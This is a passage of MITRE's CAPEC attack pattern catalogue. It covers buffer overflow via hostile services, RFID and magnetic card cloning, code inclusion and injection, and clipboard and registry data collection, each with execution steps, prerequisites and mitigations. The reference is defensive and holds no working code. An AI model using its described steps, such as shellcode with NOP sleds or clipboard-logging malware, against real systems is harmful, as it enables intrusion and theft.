ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	105	HTTP Request Splitting
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	273	HTTP Response Smuggling
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	274	HTTP Verb Tampering

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Communications
Mechanisms of Attack	Abuse Existing Functionality

Prerequisites

The client and/or server must utilize a protocol that has a weakness allowing manipulation of the interaction.

Resources Required

The adversary must be able to identify the weakness in the utilized protocol and exploit it. This may require a sniffing tool as well as packet creation abilities. The adversary will be aided if they can force the client and/or server to utilize a specific protocol known to contain exploitable weaknesses.

Related Weaknesses

CWE-ID	Weakness Name
757	Selection of Less-Secure Algorithm During Negotiation ('Algorithm Downgrade')

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Description, Extended_Description

CAPEC-14: Client-side Injection-induced Buffer Overflow

Attack Pattern ID: 14

Abstraction: Detailed

View customized information:

Description

Likelihood Of Attack

Medium

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	100	Overflow Buffers
CanFollow	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	13	Subverting Environment Variable Values

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Manipulate Data Structures

Execution Flow

Explore

Identify target client-side application: The adversary identifies a target client-side application to perform the buffer overflow on. The most common are browsers. If there is a known browser vulnerability an adversary could target that.

Experiment

Find injection vector: The adversary identifies an injection vector to deliver the excessive content to the targeted application's buffer.

Techniques
Many times client side applications will be open source, so an adversary can examine the source code to identify possible injection vectors.
Examine APIs of the client-side application and look for areas where a buffer overflow might be possible.

Create hostile service: The adversary creates a hostile service that will deliver content to the client-side application. If the intent is to simply cause the software to crash, the content need only consist of an excessive quantity of random data. If the intent is to leverage the overflow for execution of arbitrary code, the adversary crafts the payload in such a way that the overwritten return address is replaced with one of the adversary's choosing.

Techniques
If the client-side application is a browser, the adversary will create a service that delivers a malicious webpage to the browser.
Create malicious shellcode that will execute when the program execution is returned to it.
Use a NOP-sled in the overflow content to more easily "slide" into the malicious code. This is done so that the exact return address need not be correct, only in the range of all of the NOPs

Exploit

Overflow the buffer: Using the injection vector, the adversary delivers the content to the client-side application using the hostile service and overflows the buffer.

Techniques
If the adversary is targeting a local client-side application, they just need to use the service themselves.
If the adversary is attempting to cause an overflow on an external user's client-side application, they must get the user to attach to their service by some other means. This could be getting a user to visit their hostile webpage to target a user's browser.

Prerequisites

The targeted client software communicates with an external server.

The targeted client software has a buffer overflow vulnerability.

Skills Required

[Level: Low]

To achieve a denial of service, an attacker can simply overflow a buffer by inserting a long string into an attacker-modifiable injection vector.

[Level: High]

Exploiting a buffer overflow to inject malicious code into the stack of a software system or even the heap requires a more in-depth knowledge and higher skill level.

Indicators

An example of indicator is when the client software crashes after executing code downloaded from a hostile server.

Consequences

Scope	Impact	Likelihood
Confidentiality	Read Data
Integrity	Modify Data
Availability	Resource Consumption
Confidentiality Integrity Availability	Execute Unauthorized Commands

Mitigations

The client software should not install untrusted code from a non-authenticated server.

The client software should have the latest patches and should be audited for vulnerabilities before being used to communicate with potentially hostile servers.

Perform input validation for length of buffer inputs.

Use a language or compiler that performs automatic bounds checking.

Use an abstraction library to abstract away risky APIs. Not a complete solution.

Compiler-based canary mechanisms such as StackGuard, ProPolice and the Microsoft Visual Studio /GS flag. Unless this provides automatic bounds checking, it is not a complete solution.

Ensure all buffer uses are consistently bounds-checked.

Use OS-level preventative functionality. Not a complete solution.

Example Instances

Authors often use <EMBED> tags in HTML documents. For example

In Internet Explorer 4.0 an adversary attacker supplies an overly long path in the SRC= directive, the mshtml.dll component will suffer a buffer overflow. This is a standard example of content in a Web page being directed to exploit a faulty module in the system. There are potentially thousands of different ways data can propagate into a given system, thus these kinds of attacks will continue to be found in the wild.

Related Weaknesses

CWE-ID	Weakness Name
120	Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')
353	Missing Support for Integrity Check
118	Incorrect Access of Indexable Resource ('Range Error')
119	Improper Restriction of Operations within the Bounds of a Memory Buffer
74	Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')
20	Improper Input Validation
680	Integer Overflow to Buffer Overflow
697	Incorrect Comparison

References

[REF-1] G. Hoglund and G. McGraw. "Exploiting Software: How to Break Code". Addison-Wesley. 2004-02.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-01-09 (Version 2.9)	CAPEC Content Team	The MITRE Corporation
2017-01-09 (Version 2.9)	Updated Related_Attack_Patterns
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated References
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Execution_Flow
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Related_Weaknesses
2021-10-21 (Version 3.6)	CAPEC Content Team	The MITRE Corporation
2021-10-21 (Version 3.6)	Updated Description, Execution_Flow
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Example_Instances

CAPEC-397: Cloning Magnetic Strip Cards

Attack Pattern ID: 397

Abstraction: Detailed

View customized information:

Description

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	395	Bypassing Electronic Locks and Access Controls

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Physical Security
Mechanisms of Attack	Subvert Access Control

Related Weaknesses

References

[REF-33] Stuart McClure, Joel Scambray and George Kurtz. "Hacking Exposed: Network Security Secrets & Solutions". Chapter 9: Hacking Hardware. 6th Edition. McGraw Hill. 2009.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated @Abstraction, Related_Attack_Patterns

CAPEC-399: Cloning RFID Cards or Chips

Attack Pattern ID: 399

Abstraction: Detailed

View customized information:

Description

Extended Description

RFID (Radio Frequency Identification) are passive devices which consist of an integrated circuit for processing RF signals and an antenna. RFID devices are passive in that they lack an on on-board power source. The majority of RFID chips operate on either the 13.56 MHz or 135 KHz frequency. The chip is powered when a signal is received by the antenna on the chip, powering the chip long enough to send a reply message. An attacker is able to capture and analyze RFID data by either stimulating the chip to respond or being proximate to the chip when it sends a response to a remote transmitter. This allows the attacker to duplicate the signal and conduct attacks such as gaining unauthorized access to a building or impersonating a user's identification.

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	395	Bypassing Electronic Locks and Access Controls

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Physical Security
Mechanisms of Attack	Subvert Access Control

Related Weaknesses

References

[REF-33] Stuart McClure, Joel Scambray and George Kurtz. "Hacking Exposed: Network Security Secrets & Solutions". Chapter 9: Hacking Hardware. 6th Edition. McGraw Hill. 2009.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated @Abstraction, Related_Attack_Patterns
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Description, Extended_Description

CAPEC-175: Code Inclusion

Attack Pattern ID: 175

Abstraction: Meta

View customized information:

Description

Likelihood Of Attack

Medium

Typical Severity

Very High

Relationships

Nature	Type	ID	Name
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	251	Local Code Inclusion
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	253	Remote Code Inclusion
CanPrecede	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	234	Hijacking a privileged process

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Inject Unexpected Items

Prerequisites

The target application must include external code/libraries that are executed when the application runs and the adversary must be able to influence the specific files that get included.

The victim must run the targeted application, possibly using the crafted parameters that the adversary uses to identify the code to include.

Resources Required

The adversary may need the capability to host code modules if they wish their own code files to be included.

Example Instances

One example of this type of attack pattern is PHP file include attacks where the parameter of an include() function is set by a variable that an attacker is able to control. The result is that arbitrary code could be loaded into the PHP application and executed.

Related Weaknesses

CWE-ID	Weakness Name
829	Inclusion of Functionality from Untrusted Control Sphere

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-05-01 (Version 2.10)	CAPEC Content Team	The MITRE Corporation
2017-05-01 (Version 2.10)	Updated Activation_Zone, Attack_Prerequisites, Description Summary, Examples-Instances, Injection_Vector, Payload, Payload_Activation_Impact, Related_Weaknesses, Resources_Required, Typical_Likelihood_of_Exploit

CAPEC-242: Code Injection

Attack Pattern ID: 242

Abstraction: Meta

View customized information:

Description

Likelihood Of Attack

High

Typical Severity

High

Relationships

Nature	Type	ID	Name
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	19	Embedding Scripts within Scripts
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	23	File Content Injection
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	41	Using Meta-characters in E-mail Headers to Inject Malicious Payloads
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	63	Cross-Site Scripting (XSS)
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	468	Generic Cross-Browser Cross-Domain Theft
CanPrecede	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	234	Hijacking a privileged process

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Inject Unexpected Items

Prerequisites

The target software does not validate user-controlled input such that the execution of a process may be altered by sending code in through legitimate data channels, using no other mechanism.

Consequences

Scope	Impact	Likelihood
Confidentiality Integrity Availability	Other

Mitigations

Utilize strict type, character, and encoding enforcement

Ensure all input content that is delivered to client is sanitized against an acceptable content specification.

Perform input validation for all content.

Enforce regular patching of software.

Related Weaknesses

CWE-ID	Weakness Name
94	Improper Control of Generation of Code ('Code Injection')

Taxonomy Mappings

Relevant to the OWASP taxonomy mapping

Entry Name
Code Injection

References

[REF-612] "OWASP Web Security Testing Guide". Testing for Code Injection. The Open Web Application Security Project (OWASP). <https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11-Testing_for_Code_Injection.html>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-05-01 (Version 2.10)	CAPEC Content Team	The MITRE Corporation
2017-05-01 (Version 2.10)	Updated Attack_Motivation-Consequences, Attack_Prerequisites, Related_Weaknesses, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit, Typical_Severity
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Weaknesses
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated References, Taxonomy_Mappings

CAPEC CATEGORY: Collect and Analyze Information

Category ID: 118

Summary

Membership

Nature	Type	ID	Name
MemberOf	View - A view in CAPEC represents a perspective with which one might look at the collection of attack patterns defined within CAPEC. There are three different types of views: graphs, explicit slices, and implicit slices.	1000	Mechanisms of Attack
HasMember	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	116	Excavation
HasMember	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	117	Interception
HasMember	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	169	Footprinting
HasMember	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	188	Reverse Engineering
HasMember	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	192	Protocol Analysis
HasMember	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	224	Fingerprinting
HasMember	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	410	Information Elicitation

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-01-09 (Version 2.9)	CAPEC Content Team	The MITRE Corporation
2017-01-09 (Version 2.9)	Updated Relationships
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Relationships
Previous Entry Names
Change Date	Previous Entry Name
2017-01-09 (Version 2.9)	Gather Information

CAPEC-569: Collect Data as Provided by Users

Attack Pattern ID: 569

Abstraction: Standard

View customized information:

Description

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	116	Excavation
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	568	Capture Credentials via Keylogger

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Collect and Analyze Information

Related Weaknesses

Some type of access control weakness (CWE-284 or its descendants) is related to this CAPEC, probably as a prerequisite.

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping

Entry ID	Entry Name
1056	Input Capture

Content History

Submissions
Submission Date	Submitter	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)
Modifications
Modification Date	Modifier	Organization
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated References
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated Related_Attack_Patterns
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Related_Attack_Patterns, Taxonomy_Mappings
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Related_Attack_Patterns, Taxonomy_Mappings

CAPEC-637: Collect Data from Clipboard

Attack Pattern ID: 637

Abstraction: Detailed

View customized information:

Description

Likelihood Of Attack

Low

Typical Severity

Low

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	150	Collect Data from Common Resource Locations

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Collect and Analyze Information

Execution Flow

Explore

Find an application that allows copying sensititve data to clipboad: An adversary first needs to find an application that allows copying and pasting of sensitive information. This could be an application that prints out temporary passwords to the screen, private email addresses, or any other sensitive information or data

Experiment

Target users of the application: An adversary will target users of the application in order to obtain the information in their clipboard on a periodic basic

Techniques
Install malware on a user's system designed to log clipboard contents periodically
Get the user to click on a malicious link that will bring them to an application to log the contents of the clipboard

Exploit

Follow-up attack: Use any sensitive information found to carry out a follow-up attack

Prerequisites

The adversary must have a means (i.e., a pre-installed tool or background process) by which to collect data from the clipboard and store it. That is, when the target copies data to the clipboard (e.g., to paste into another application), the adversary needs some means of capturing that data in a third location.

Skills Required

[Level: High]

To deploy a hidden process or malware on the system to automatically collect clipboard data.

Consequences

Scope	Impact	Likelihood
Confidentiality	Read Data

Mitigations

While copying and pasting of data with the clipboard is a legitimate and practical function, certain situations and context may require the disabling of this feature. Just as certain applications disable screenshot capability, applications that handle highly sensitive information should consider disabling copy and paste functionality.

Employ a robust identification and audit/blocking via using an allowlist of applications on your system. Malware may contain the functionality associated with this attack pattern.

Related Weaknesses

CWE-ID	Weakness Name
267	Privilege Defined With Unsafe Actions

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (also see parent)

Entry ID	Entry Name
1115	Clipboard Data

Content History

Submissions
Submission Date	Submitter	Organization
2018-07-31 (Version 2.12)	CAPEC Content Team
2018-07-31 (Version 2.12)
Modifications
Modification Date	Modifier	Organization
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated Related_Attack_Patterns
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Description, Mitigations, Related_Attack_Patterns
2021-10-21 (Version 3.6)	CAPEC Content Team	The MITRE Corporation
2021-10-21 (Version 3.6)	Updated Execution_Flow

CAPEC-150: Collect Data from Common Resource Locations

Attack Pattern ID: 150

Abstraction: Standard

View customized information:

Description

Typical Severity

Medium

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	116	Excavation
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	143	Detect Unpublicized Web Pages
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	144	Detect Unpublicized Web Services
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	155	Screen Temporary Files for Sensitive Information
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	406	Dumpster Diving
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	637	Collect Data from Clipboard
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	647	Collect Data from Registries
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	648	Collect Data from Screen Capture

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Hardware, Physical Security
Mechanisms of Attack	Collect and Analyze Information

Prerequisites

The targeted applications must either expect files to be located at a specific location or, if the location of the files can be configured by the user, the user either failed to move the files from the default location or placed them in a conventional location for files of the given type.

Resources Required

None: No specialized resources are required to execute this type of attack. In some cases, the attacker need not even have direct access to the locations on the target computer where the targeted resources reside.

Example Instances

An adversary can use a technique called Bluesnarfing to retrieve data from Bluetooth enabled devices in which they know where the data is located. This is done by connecting to the device’s Object Exchange (OBEX) Push Profile and making OBEX GET requests for known filenames (contact lists, photos, recent calls). Bluesnarfing was patched shortly after its discovery in 2003 and will only work on devices created before or during this time.

Related Weaknesses

CWE-ID	Weakness Name
552	Files or Directories Accessible to External Parties
1239	Improper Zeroization of Hardware Register
1258	Exposure of Sensitive System Information Due to Uncleared Debug Information
1266	Improper Scrubbing of Sensitive Data from Decommissioned Device
1272	Sensitive Information Uncleared Before Debug/Power State Transition
1323	Improper Management of Sensitive Trace Data
1330	Remanent Data Readable after Memory Erase

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping

Entry ID	Entry Name
1003	OS Credential Dumping
1119	Automated Collection
1213	Data from Information Repositories
1530	Data from Cloud Storage Object
1555	Credentials from Password Stores
1602	Data from Configuration Repository

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)	Updated Description Summary
2015-12-07 (Version 2.8)	CAPEC Content Team	The MITRE Corporation
2015-12-07 (Version 2.8)	Updated Description Summary
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Resources_Required
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Weaknesses
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Related_Weaknesses, Taxonomy_Mappings
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated Related_Weaknesses
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Example_Instances, Related_Attack_Patterns, Taxonomy_Mappings
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Taxonomy_Mappings
2023-01-24 (Version 3.9)	CAPEC Content Team	The MITRE Corporation
2023-01-24 (Version 3.9)	Updated Related_Weaknesses
Previous Entry Names
Change Date	Previous Entry Name
2015-12-07 (Version 2.8)	Common Resource Location Exploration

CAPEC-647: Collect Data from Registries

Attack Pattern ID: 647

Abstraction: Detailed

View customized information:

Description

Likelihood Of Attack

Medium

Typical Severity

Medium

Relationships

Nature	Type	ID	Name
